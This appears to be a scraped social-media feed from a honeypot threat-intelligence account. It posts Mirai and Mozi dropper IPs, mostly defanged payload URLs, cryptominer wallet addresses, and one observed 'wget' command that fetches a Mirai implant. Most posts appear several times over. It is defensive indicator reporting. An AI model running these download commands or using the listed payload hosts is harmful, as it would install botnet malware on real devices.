Shoggoth-Industries
@shoggot-indus.bsky.social
CTI honeypoting report.
Website : https://shoggoth.industries/
Virus total: https://www.virustotal.com/gui/user/Shoggoth_Industries
Website : https://shoggoth.industries/
Virus total: https://www.virustotal.com/gui/user/Shoggoth_Industries
New Blog Post: Hunt the Hunter.
Short Article about C2 hunter on the NET.
blog.shoggoth.industries/articles/hun...
#binaryedge
#malwarehunter
#C2
Short Article about C2 hunter on the NET.
blog.shoggoth.industries/articles/hun...
#binaryedge
#malwarehunter
#C2
Hunt the Hunter
Introduction # After about two months of telemetry, we observed certain recurring behavior on our honeypots.
blog.shoggoth.industries
March 1, 2025 at 8:15 PM
New Blog Post: Hunt the Hunter.
Short Article about C2 hunter on the NET.
blog.shoggoth.industries/articles/hun...
#binaryedge
#malwarehunter
#C2
Short Article about C2 hunter on the NET.
blog.shoggoth.industries/articles/hun...
#binaryedge
#malwarehunter
#C2
February 5, 2025 at 11:34 PM
[2025-01-28]
[Stage 1 Dropper]:
8: 87.121.84.7
9: 115.49.126.169
[Stage 2 Dropper]:
8: URL not a IP or domain , see report.
9: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
8: 87.121.84.7
9: 115.49.126.169
[Stage 2 Dropper]:
8: URL not a IP or domain , see report.
9: URL not a IP or domain , see report.
Shoggoth today report.
January 30, 2025 at 10:24 PM
[2025-01-28]
[Stage 1 Dropper]:
8: 87.121.84.7
9: 115.49.126.169
[Stage 2 Dropper]:
8: URL not a IP or domain , see report.
9: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
8: 87.121.84.7
9: 115.49.126.169
[Stage 2 Dropper]:
8: URL not a IP or domain , see report.
9: URL not a IP or domain , see report.
Shoggoth today report.
[2025-01-28]
[Stage 1 Dropper]:
6: 42.224.192.154
7: 59.184.246.90
[Stage 2 Dropper]:
6: URL not a IP or domain , see report.
7: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
6: 42.224.192.154
7: 59.184.246.90
[Stage 2 Dropper]:
6: URL not a IP or domain , see report.
7: URL not a IP or domain , see report.
Shoggoth today report.
January 30, 2025 at 10:24 PM
[2025-01-28]
[Stage 1 Dropper]:
6: 42.224.192.154
7: 59.184.246.90
[Stage 2 Dropper]:
6: URL not a IP or domain , see report.
7: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
6: 42.224.192.154
7: 59.184.246.90
[Stage 2 Dropper]:
6: URL not a IP or domain , see report.
7: URL not a IP or domain , see report.
Shoggoth today report.
[2025-01-28]
[Stage 1 Dropper]:
4: 45.148.10.242
5: 194.42.107.85
[Stage 2 Dropper]:
4: URL not a IP or domain , see report.
5: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
4: 45.148.10.242
5: 194.42.107.85
[Stage 2 Dropper]:
4: URL not a IP or domain , see report.
5: URL not a IP or domain , see report.
Shoggoth today report.
January 30, 2025 at 10:24 PM
[2025-01-28]
[Stage 1 Dropper]:
4: 45.148.10.242
5: 194.42.107.85
[Stage 2 Dropper]:
4: URL not a IP or domain , see report.
5: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
4: 45.148.10.242
5: 194.42.107.85
[Stage 2 Dropper]:
4: URL not a IP or domain , see report.
5: URL not a IP or domain , see report.
Shoggoth today report.
[2025-01-28]
[Stage 1 Dropper]:
2: 141.255.166.90
3: 45.148.10.242
[Stage 2 Dropper]:
2: URL not a IP or domain , see report.
3: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
2: 141.255.166.90
3: 45.148.10.242
[Stage 2 Dropper]:
2: URL not a IP or domain , see report.
3: URL not a IP or domain , see report.
Shoggoth today report.
January 30, 2025 at 10:24 PM
[2025-01-28]
[Stage 1 Dropper]:
2: 141.255.166.90
3: 45.148.10.242
[Stage 2 Dropper]:
2: URL not a IP or domain , see report.
3: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
2: 141.255.166.90
3: 45.148.10.242
[Stage 2 Dropper]:
2: URL not a IP or domain , see report.
3: URL not a IP or domain , see report.
Shoggoth today report.
[2025-01-28]
[Stage 1 Dropper]:
1: 117.215.59.182
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
1: 117.215.59.182
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
Shoggoth today report.
January 30, 2025 at 10:24 PM
[2025-01-28]
[Stage 1 Dropper]:
1: 117.215.59.182
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
1: 117.215.59.182
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
Shoggoth today report.
[2025-01-28]
[Stage 1 Dropper]:
1: 141.255.166.90
2: 81.17.101.155
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
2: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
1: 141.255.166.90
2: 81.17.101.155
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
2: URL not a IP or domain , see report.
Shoggoth today report.
January 29, 2025 at 9:10 PM
[2025-01-28]
[Stage 1 Dropper]:
1: 141.255.166.90
2: 81.17.101.155
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
2: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
1: 141.255.166.90
2: 81.17.101.155
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
2: URL not a IP or domain , see report.
Shoggoth today report.
[2025-01-28]
[Stage 1 Dropper]:
2: 175.107.2.120
3: 112.113.206.189
[Stage 2 Dropper]:
2: URL not a IP or domain , see report.
3: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
2: 175.107.2.120
3: 112.113.206.189
[Stage 2 Dropper]:
2: URL not a IP or domain , see report.
3: URL not a IP or domain , see report.
Shoggoth today report.
January 28, 2025 at 11:30 PM
[2025-01-28]
[Stage 1 Dropper]:
2: 175.107.2.120
3: 112.113.206.189
[Stage 2 Dropper]:
2: URL not a IP or domain , see report.
3: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
2: 175.107.2.120
3: 112.113.206.189
[Stage 2 Dropper]:
2: URL not a IP or domain , see report.
3: URL not a IP or domain , see report.
Shoggoth today report.
[2025-01-28]
[Stage 1 Dropper]:
1: 81.17.101.155
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
1: 81.17.101.155
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
Shoggoth today report.
January 28, 2025 at 11:30 PM
[2025-01-28]
[Stage 1 Dropper]:
1: 81.17.101.155
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
Shoggoth today report.
[Stage 1 Dropper]:
1: 81.17.101.155
[Stage 2 Dropper]:
1: URL not a IP or domain , see report.
Shoggoth today report.
[25-01-2024]
[Stage 1 Dropper]:
46.19.143[.]26
45.230.66[.]59
190.77.194[.]80
[Stage 2 Dropper] :
http://185.225.17[.]58/create.py
http://45.230.66[.]59:11404/Mozi.m
http://154.213.189[.]145/sh
See more at:
blog.shoggoth.industries/daily-posts/...
#mirai
[Stage 1 Dropper]:
46.19.143[.]26
45.230.66[.]59
190.77.194[.]80
[Stage 2 Dropper] :
http://185.225.17[.]58/create.py
http://45.230.66[.]59:11404/Mozi.m
http://154.213.189[.]145/sh
See more at:
blog.shoggoth.industries/daily-posts/...
#mirai
Report: 2025-01-25
Daily Report: 2025-01-25 # interaction report on http service of various Hhoneypot around the world.
blog.shoggoth.industries
January 25, 2025 at 11:02 PM
[25-01-2024]
[Stage 1 Dropper]:
46.19.143[.]26
45.230.66[.]59
190.77.194[.]80
[Stage 2 Dropper] :
http://185.225.17[.]58/create.py
http://45.230.66[.]59:11404/Mozi.m
http://154.213.189[.]145/sh
See more at:
blog.shoggoth.industries/daily-posts/...
#mirai
[Stage 1 Dropper]:
46.19.143[.]26
45.230.66[.]59
190.77.194[.]80
[Stage 2 Dropper] :
http://185.225.17[.]58/create.py
http://45.230.66[.]59:11404/Mozi.m
http://154.213.189[.]145/sh
See more at:
blog.shoggoth.industries/daily-posts/...
#mirai
[23-01-2024]
[Stage 1 Dropper]:
185.196.10[.]129
117.213.82[.]239
45.164.177[.]181
[Stage 2 Dropper] :
http://193.143.1[.]66/bins
http://117.213.82[.]239:56175/Mozi.m
http://45.164.177[.]181:10220/Mozi.m
#mirai
#dropper
#CTI
[Stage 1 Dropper]:
185.196.10[.]129
117.213.82[.]239
45.164.177[.]181
[Stage 2 Dropper] :
http://193.143.1[.]66/bins
http://117.213.82[.]239:56175/Mozi.m
http://45.164.177[.]181:10220/Mozi.m
#mirai
#dropper
#CTI
January 24, 2025 at 8:33 AM
[23-01-2024]
[Stage 1 Dropper]:
185.196.10[.]129
117.213.82[.]239
45.164.177[.]181
[Stage 2 Dropper] :
http://193.143.1[.]66/bins
http://117.213.82[.]239:56175/Mozi.m
http://45.164.177[.]181:10220/Mozi.m
#mirai
#dropper
#CTI
[Stage 1 Dropper]:
185.196.10[.]129
117.213.82[.]239
45.164.177[.]181
[Stage 2 Dropper] :
http://193.143.1[.]66/bins
http://117.213.82[.]239:56175/Mozi.m
http://45.164.177[.]181:10220/Mozi.m
#mirai
#dropper
#CTI
[Multi architecture and exploit Dropper]
src req ip:
185.196.10.129
Requested URL:
http://193.143.1[.]66/aws
http://193.143.1[.]66/bins
http://193.143.1[.]66/lg
http://193.143.1[.]66/pulse
http://193.143.1[.]66/thinkphp
Reference: github.com/govcert-ch/C...
#mirai
#botnet
#Russia
src req ip:
185.196.10.129
Requested URL:
http://193.143.1[.]66/aws
http://193.143.1[.]66/bins
http://193.143.1[.]66/lg
http://193.143.1[.]66/pulse
http://193.143.1[.]66/thinkphp
Reference: github.com/govcert-ch/C...
#mirai
#botnet
#Russia
January 21, 2025 at 9:39 PM
[Multi architecture and exploit Dropper]
src req ip:
185.196.10.129
Requested URL:
http://193.143.1[.]66/aws
http://193.143.1[.]66/bins
http://193.143.1[.]66/lg
http://193.143.1[.]66/pulse
http://193.143.1[.]66/thinkphp
Reference: github.com/govcert-ch/C...
#mirai
#botnet
#Russia
src req ip:
185.196.10.129
Requested URL:
http://193.143.1[.]66/aws
http://193.143.1[.]66/bins
http://193.143.1[.]66/lg
http://193.143.1[.]66/pulse
http://193.143.1[.]66/thinkphp
Reference: github.com/govcert-ch/C...
#mirai
#botnet
#Russia
[Potential Cryptominer C&C server]
REQ SRC IP: 185.213.175[.]171
It's seen to use the XMRig software.
Requested monero wallet:
49PybvnVss4jhuo7AxfL2TU1CbMXt2qJVhnVPqoys2qxcr2iMwJrCKoSfgAuoxYo6jToQfHpbeREMWKBLApcuCESSDgecfZ
#monero
#cryptominer
#XMRig
REQ SRC IP: 185.213.175[.]171
It's seen to use the XMRig software.
Requested monero wallet:
49PybvnVss4jhuo7AxfL2TU1CbMXt2qJVhnVPqoys2qxcr2iMwJrCKoSfgAuoxYo6jToQfHpbeREMWKBLApcuCESSDgecfZ
#monero
#cryptominer
#XMRig
January 19, 2025 at 8:29 PM
[Potential Cryptominer C&C server]
REQ SRC IP: 185.213.175[.]171
It's seen to use the XMRig software.
Requested monero wallet:
49PybvnVss4jhuo7AxfL2TU1CbMXt2qJVhnVPqoys2qxcr2iMwJrCKoSfgAuoxYo6jToQfHpbeREMWKBLApcuCESSDgecfZ
#monero
#cryptominer
#XMRig
REQ SRC IP: 185.213.175[.]171
It's seen to use the XMRig software.
Requested monero wallet:
49PybvnVss4jhuo7AxfL2TU1CbMXt2qJVhnVPqoys2qxcr2iMwJrCKoSfgAuoxYo6jToQfHpbeREMWKBLApcuCESSDgecfZ
#monero
#cryptominer
#XMRig
[19-01-2024]
Stage 1 Dropper]:
146.190.96[.]244
115.50.148[.]57
[Stage 2 Dropper] :
159.223.45[.]59/jaws
http://115.50.148[.]57:52550/Mozi.a
Stage 1 Dropper]:
146.190.96[.]244
115.50.148[.]57
[Stage 2 Dropper] :
159.223.45[.]59/jaws
http://115.50.148[.]57:52550/Mozi.a
January 19, 2025 at 8:19 PM
[19-01-2024]
Stage 1 Dropper]:
146.190.96[.]244
115.50.148[.]57
[Stage 2 Dropper] :
159.223.45[.]59/jaws
http://115.50.148[.]57:52550/Mozi.a
Stage 1 Dropper]:
146.190.96[.]244
115.50.148[.]57
[Stage 2 Dropper] :
159.223.45[.]59/jaws
http://115.50.148[.]57:52550/Mozi.a
[Stage 1 Dropper]: 18-01-2024
120.85.113[.]237
183.131.19[.]86
[Stage 2 Dropper] :
http://103.163.215[.]73/moo
http://129.159.107[.]197/jaws
#mirai
120.85.113[.]237
183.131.19[.]86
[Stage 2 Dropper] :
http://103.163.215[.]73/moo
http://129.159.107[.]197/jaws
#mirai
January 18, 2025 at 10:18 PM
[Stage 1 Dropper]: 18-01-2024
120.85.113[.]237
183.131.19[.]86
[Stage 2 Dropper] :
http://103.163.215[.]73/moo
http://129.159.107[.]197/jaws
#mirai
120.85.113[.]237
183.131.19[.]86
[Stage 2 Dropper] :
http://103.163.215[.]73/moo
http://129.159.107[.]197/jaws
#mirai
January 18, 2025 at 10:18 PM
[Stage 1 Dropper]: 17-01-2024
31.220.1[.]144
117.215.49[.]242
27.193.186[.]202
45.230.66[.]53
[Stage 2 Dropper]
http://45.230.66[.]53:11213/Mozi.a
http://103.163.215[.]73/moo
31.220.1[.]144
117.215.49[.]242
27.193.186[.]202
45.230.66[.]53
[Stage 2 Dropper]
http://45.230.66[.]53:11213/Mozi.a
http://103.163.215[.]73/moo
January 18, 2025 at 10:17 PM
[Stage 1 Dropper]: 17-01-2024
31.220.1[.]144
117.215.49[.]242
27.193.186[.]202
45.230.66[.]53
[Stage 2 Dropper]
http://45.230.66[.]53:11213/Mozi.a
http://103.163.215[.]73/moo
31.220.1[.]144
117.215.49[.]242
27.193.186[.]202
45.230.66[.]53
[Stage 2 Dropper]
http://45.230.66[.]53:11213/Mozi.a
http://103.163.215[.]73/moo
[Potential MIRAI dropper]
See picture 1 for full request.
SRC REQ IP:
141.98.11[.]119
See picture 2.
website used as dropper.
http://theeyefirewall[.]su
#mirai
See picture 1 for full request.
SRC REQ IP:
141.98.11[.]119
See picture 2.
website used as dropper.
http://theeyefirewall[.]su
#mirai
January 18, 2025 at 10:16 PM
[Potential MIRAI dropper]
See picture 1 for full request.
SRC REQ IP:
141.98.11[.]119
See picture 2.
website used as dropper.
http://theeyefirewall[.]su
#mirai
See picture 1 for full request.
SRC REQ IP:
141.98.11[.]119
See picture 2.
website used as dropper.
http://theeyefirewall[.]su
#mirai
[Interesting]
Malware-hunter census shodan IP: 66.240.205[.]34
IP that request other with dummy C2 zombie response hope that a C2 will respond.
#shodan
#C2
#detection
Malware-hunter census shodan IP: 66.240.205[.]34
IP that request other with dummy C2 zombie response hope that a C2 will respond.
#shodan
#C2
#detection
January 18, 2025 at 10:15 PM
[Interesting]
Malware-hunter census shodan IP: 66.240.205[.]34
IP that request other with dummy C2 zombie response hope that a C2 will respond.
#shodan
#C2
#detection
Malware-hunter census shodan IP: 66.240.205[.]34
IP that request other with dummy C2 zombie response hope that a C2 will respond.
#shodan
#C2
#detection
[Stage 1 Dropper]: 13-01-2024
31.220.1[.]144
117.199.152[.]94
103.158.96[.]157
31.220.1[.]144
117.199.152[.]94
103.158.96[.]157
January 18, 2025 at 10:15 PM
[Stage 1 Dropper]: 13-01-2024
31.220.1[.]144
117.199.152[.]94
103.158.96[.]157
31.220.1[.]144
117.199.152[.]94
103.158.96[.]157
[Mirai dropper]
SRC request IP: 185.187.235[.]243
Requested dropper url : wget http://103.163.215[.]73/hello
Multi architecture dropper targeting .
Virus total url for mips architecture imlpant.
virustotal.com/gui/file/af4...
#mirai
SRC request IP: 185.187.235[.]243
Requested dropper url : wget http://103.163.215[.]73/hello
Multi architecture dropper targeting .
Virus total url for mips architecture imlpant.
virustotal.com/gui/file/af4...
#mirai
January 18, 2025 at 10:14 PM
[Mirai dropper]
SRC request IP: 185.187.235[.]243
Requested dropper url : wget http://103.163.215[.]73/hello
Multi architecture dropper targeting .
Virus total url for mips architecture imlpant.
virustotal.com/gui/file/af4...
#mirai
SRC request IP: 185.187.235[.]243
Requested dropper url : wget http://103.163.215[.]73/hello
Multi architecture dropper targeting .
Virus total url for mips architecture imlpant.
virustotal.com/gui/file/af4...
#mirai
[Potential Cryptominer C&C server]
REQ SRC IP: 185.213.175[.]171
It's seen to use the XMRig software.
requested monero wallet: 49813t4akUsWfmnfBnwsMEeWd4APL94Ji7CL9qgnVCTJeHeZEARaurtDnQ2dzhDzSMjZSJxonjPeQXrkAX37gWj32jWsd4j
#cryptominer
#monero
#XMRig
REQ SRC IP: 185.213.175[.]171
It's seen to use the XMRig software.
requested monero wallet: 49813t4akUsWfmnfBnwsMEeWd4APL94Ji7CL9qgnVCTJeHeZEARaurtDnQ2dzhDzSMjZSJxonjPeQXrkAX37gWj32jWsd4j
#cryptominer
#monero
#XMRig
January 18, 2025 at 10:11 PM
[Potential Cryptominer C&C server]
REQ SRC IP: 185.213.175[.]171
It's seen to use the XMRig software.
requested monero wallet: 49813t4akUsWfmnfBnwsMEeWd4APL94Ji7CL9qgnVCTJeHeZEARaurtDnQ2dzhDzSMjZSJxonjPeQXrkAX37gWj32jWsd4j
#cryptominer
#monero
#XMRig
REQ SRC IP: 185.213.175[.]171
It's seen to use the XMRig software.
requested monero wallet: 49813t4akUsWfmnfBnwsMEeWd4APL94Ji7CL9qgnVCTJeHeZEARaurtDnQ2dzhDzSMjZSJxonjPeQXrkAX37gWj32jWsd4j
#cryptominer
#monero
#XMRig
[Bio website of DDoS operator]
http://185.187.235[.]243/
md5 Hash of the Favicon:
shodan.io/search?query...
Bio website template.
github.com/Yoghurt1337/Bi
http://185.187.235[.]243/
md5 Hash of the Favicon:
shodan.io/search?query...
Bio website template.
github.com/Yoghurt1337/Bi
January 18, 2025 at 10:10 PM
[Bio website of DDoS operator]
http://185.187.235[.]243/
md5 Hash of the Favicon:
shodan.io/search?query...
Bio website template.
github.com/Yoghurt1337/Bi
http://185.187.235[.]243/
md5 Hash of the Favicon:
shodan.io/search?query...
Bio website template.
github.com/Yoghurt1337/Bi